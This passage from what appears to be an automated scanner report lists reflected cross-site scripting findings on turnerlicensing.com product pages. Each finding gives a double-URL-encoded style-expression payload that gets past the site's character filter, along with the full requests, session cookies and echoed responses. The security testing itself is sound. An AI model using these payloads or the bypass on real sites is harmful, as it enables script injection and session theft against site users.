Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 17:51:27 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 41613


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/?616be%27style%3d%27x%3aexpression%28alert%281%29%29%27018d474a113=1&616be'style='x:expression(alert(1))'018d474a113=1'>
...[SNIP]...

2.157. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /11x17_recordable_message_centers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:16 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1699153863:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=964
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100076


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>11x17 Recordable Message Centers</title>


<script language='JavaScript' type='text/javascript'>window.status=
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262186&75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1&75fdb'style='x:expression(alert(1))'768256e6a68=1&fromsla=T&75fdb%27style%3d%27x%3aexpression%28alert%281%29%29%27768256e6a68=1'>
...[SNIP]...

2.158. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /11x17_sound_message_centers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:18 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109265876:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=926
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100288


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>11x17 Sound Message Centers</title>


<script language='JavaScript' type='text/javascript'>window.status='Load
...[SNIP]...
erlicensing.com/s.nl?category=175948&4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1&4cc6b%27style%3d%27x%3aexpression%28alert%281%29%29%27eea3ebc05ed=1&fromsla=T&4cc6b'style='x:expression(alert(1))'eea3ebc05ed=1'>
...[SNIP]...

2.159. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /2_year_planners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:17 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778535204:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=993
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99347


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>2 Year Planners</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=730809&59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1&59479'style='x:expression(alert(1))'789fbd98f9=1&59479%27style%3d%27x%3aexpression%28alert%281%29%29%27789fbd98f9=1&fromsla=T'>
...[SNIP]...

2.160. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /3_ring_binders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:15 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1666335954:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=861
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76372


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>3-Ring Binders</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175952&83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1&83686'style='x:expression(alert(1))'31528bb40bd=1&fromsla=T&83686%27style%3d%27x%3aexpression%28alert%281%29%29%2731528bb40bd=1'>
...[SNIP]...

2.161. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /3_subject_notebooks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:19 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114181783:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=963
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99744


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>3 Subject Notebooks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262132&f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1&f63ec'style='x:expression(alert(1))'5164698b3fe=1&f63ec%27style%3d%27x%3aexpression%28alert%281%29%29%275164698b3fe=1&fromsla=T'>
...[SNIP]...

2.162. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /5x8_notepads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:21 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558082987:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=967
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100309


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>5x8 Notepads</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175950&1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1&1bbd7'style='x:expression(alert(1))'3ded6a6acc=1&1bbd7%27style%3d%27x%3aexpression%28alert%281%29%29%273ded6a6acc=1&fromsla=T'>
...[SNIP]...

2.163. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /5x8_planners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:20 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1558082685:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=955
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100061


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>5x8 Planners</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262138&dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1&fromsla=T&dec49'style='x:expression(alert(1))'b65b930df92=1&dec49%27style%3d%27x%3aexpression%28alert%281%29%29%27b65b930df92=1'>
...[SNIP]...

2.164. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /MLB

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:30 GMT
NS_RTIMER_COMPOSITE: 670284442:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 57803


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>MLB</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=68&8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1&8600f%27style%3d%27x%3aexpression%28alert%281%29%29%2740335c5bc15=1&8600f'style='x:expression(alert(1))'40335c5bc15=1&fromsla=T'>
...[SNIP]...

2.165. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA?e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.turnerlicensing.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272924.1290272963.7; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272963; __utmc=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:57 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:58 GMT
NS_RTIMER_COMPOSITE: -367531585:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JnnzMyKdyxbFsWhzHTc3QhzQf7lJ1pKW7GGN5xtJyC1x8h3RQKWHgXvy2TxRqxsqJZLQ361q6Llxdq9S8Tb2NkJHbZnYvfnLQ5Yd2QMRndHqbXGhYNGqcLPlv55d4yPF!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 17:51:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 58118


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NBA</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=69&e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968=1&e1530%27style%3d%27x%3aexpression%28alert%281%29%29%27b802c6ba968=1&e1530'style='x:expression(alert(1))'b802c6ba968=1&fromsla=T'>
...[SNIP]...

2.166. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/boston_celtics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
